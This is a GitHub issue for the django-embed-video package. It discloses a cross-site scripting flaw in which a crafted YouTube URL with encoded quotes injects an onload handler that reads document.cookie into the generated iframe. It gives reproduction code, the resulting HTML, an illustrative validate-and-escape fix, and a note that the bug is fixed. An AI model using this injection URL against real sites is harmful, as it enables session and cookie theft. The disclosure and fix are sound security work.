jazzband / django-embed-video

Django app for easy embedding YouTube and Vimeo videos and music from SoundCloud.

Home Page: http://django-embed-video.rtfd.org


XSS possible in YoutubeBackend with user-provided URL

Remiz opened this issue

Hi,

I think I've noticed a possible XSS using this package when users are allowed to provide URLs.
Here is the code I've used to reproduce the issue:

from embed_video.backends import detect_backend

# User-controlled watch URL; the percent-encoded %22 sequences decode to double quotes.
# (In this Python literal '\a' is the bell character, which is why the output below
# shows 'sa\C0DPdy98e4c' rather than 'asa\C0DPdy98e4c'.)
url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = detect_backend(url)   # resolves to the YouTube backend
video.is_secure = True        # emit an https:// embed URL
print(video.get_embed_code(800, 400))  # width, height

And here is the result of the embedded code:

<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>

It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.

Hi and thanks for catching this.

The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?
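To make the root cause and the "validate and sanitize" remedy concrete, here is an added stand-alone example; it is not the project's code or the fix in #187. `naive_embed` mirrors the reported behaviour (parse_qs percent-decodes the `v` value and it is interpolated unescaped into the `src` attribute), and `safe_embed` applies the two controls that close it: the video id must match the 11-character YouTube id alphabet, and every interpolated value is escaped for attribute context. The allowed host list, the id regex and the shortened form of the reported URL are assumptions constructed for this example.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Assumption: a YouTube video id is exactly 11 chars from this alphabet.
YOUTUBE_ID_RE = re.compile(r"^[A-Za-z0-9_-]{11}$")
# Assumption: only these hosts are accepted for watch URLs.
ALLOWED_HOSTS = {"www.youtube.com", "youtube.com", "m.youtube.com"}

# Constructed, shortened form of the URL in the report above.
REPORTED_URL = ("https://www.youtube.com/watch?v=C0DPdy98e4c%22"
                " onload=%22alert(document.cookie)%22")
EMBED_TEMPLATE = '<iframe width="%d" height="%d" src="%s"></iframe>'


def naive_embed(url, width, height):
    """Reproduce the reported behaviour: parse_qs decodes %22 to a quote and
    the value lands in the attribute without escaping or validation."""
    code = parse_qs(urlparse(url).query)["v"][0]
    src = "https://www.youtube.com/embed/%s?wmode=opaque" % code
    return EMBED_TEMPLATE % (width, height, src)


def extract_youtube_id(url):
    """Return the video id only if scheme, host and id shape all check out."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        return None
    values = parse_qs(parsed.query).get("v", [])
    if len(values) != 1 or not YOUTUBE_ID_RE.match(values[0]):
        return None
    return values[0]


def safe_embed(url, width, height):
    """Reject anything that is not a plain watch URL, then escape for the
    attribute context even though the whitelist already excludes quotes."""
    code = extract_youtube_id(url)
    if code is None:
        raise ValueError("not a valid YouTube watch URL")
    src = html.escape("https://www.youtube.com/embed/%s?wmode=opaque" % code,
                      quote=True)
    return EMBED_TEMPLATE % (int(width), int(height), src)


if __name__ == "__main__":
    print(naive_embed(REPORTED_URL, 800, 400))   # attribute breakout visible
    print(extract_youtube_id(REPORTED_URL))      # None: id fails the regex
    print(safe_embed("https://www.youtube.com/watch?v=C0DPdy98e4c", 800, 400))
```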

Fixed by #187